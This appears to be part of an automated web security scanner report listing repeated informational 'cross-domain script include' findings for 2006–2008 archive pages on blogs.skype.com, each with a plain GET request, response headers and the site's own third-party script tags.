<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.27. http://blogs.skype.com/en/2006/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/11/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:30 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 351504
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.28. http://blogs.skype.com/en/2006/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/12/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:28 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 288676
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.29. http://blogs.skype.com/en/2007/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/01/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2007/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:27 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 242360
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.30. http://blogs.skype.com/en/2007/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/02/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2007/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:25 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 165110
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.31. http://blogs.skype.com/en/2007/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/03/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2007/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:24 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 228535
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.32. http://blogs.skype.com/en/2007/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/04/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2007/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:23 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 107509
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.33. http://blogs.skype.com/en/2007/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/05/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2007/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:22 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 262371
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.34. http://blogs.skype.com/en/2007/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/06/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2007/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:20 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 204711
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.35. http://blogs.skype.com/en/2007/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/07/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2007/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:19 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 170679
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.36. http://blogs.skype.com/en/2007/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/08/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2007/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:17 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 617800
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.37. http://blogs.skype.com/en/2007/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/09/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2007/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:15 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 111695
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.38. http://blogs.skype.com/en/2007/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/10/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2007/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:14 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 134252
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.39. http://blogs.skype.com/en/2007/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2007/11/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2007/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:13 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 137689
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.40. http://blogs.skype.com/en/2008/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/01/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:12 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 125026
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.41. http://blogs.skype.com/en/2008/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2008/02/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2008/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:11 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 106907
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
